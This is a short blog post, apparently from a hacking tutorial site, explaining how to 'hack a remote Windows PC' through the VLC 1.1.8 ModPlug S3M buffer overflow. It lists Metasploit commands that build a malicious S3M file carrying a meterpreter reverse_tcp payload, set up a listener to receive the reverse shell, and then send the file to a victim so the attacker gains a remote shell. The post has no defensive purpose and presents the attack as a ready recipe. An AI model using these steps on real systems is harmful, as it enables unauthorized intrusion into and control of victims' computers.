Banner 480

Minggu, 10 Juni 2012

Hack Remote Windows PC using Video LAN VLC ModPlug ReadS3M Stack Buffer Overflow

This module exploits an input validation error in libmod_plugin as included with Video LAN VLC 1.1.8. All versions prior to version 1.1.9 are affected. By creating a malicious S3M file, a remote attacker could execute arbitrary code. Although other products that bundle lib modplug may be vulnerable, this module was only tested against VLC. NOTE: As of July 1st, 2010, VLC now calls Set Process DEPPoly to permanently enable NX support on machines that support it. As such, this module is capable of bypassing DEP, but not ASLR.

Exploit Targets
VLC 1.1.8
Windows XP SP 2

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open backtrack terminal type msfconsole


Now type use exploit/windows/fileformat/vlc_modplug_s3m
Msf exploit (vlc_modplug_s3m)>set payload windows/meterpreter/reverse_tcp
Msf exploit (vlc_modplug_s3m)>set lhost 192.168.1.3 (IP of Local Host)
Msf exploit (vlc_modplug_s3m)>exploit


After we successfully generate the malicious s3m File, it will stored on your local computer
/root/.msf4/local/msf.s3m


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
exploit

Now send your msf.s3m files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Banner 480 bawah




Your Clicks! Your Earning!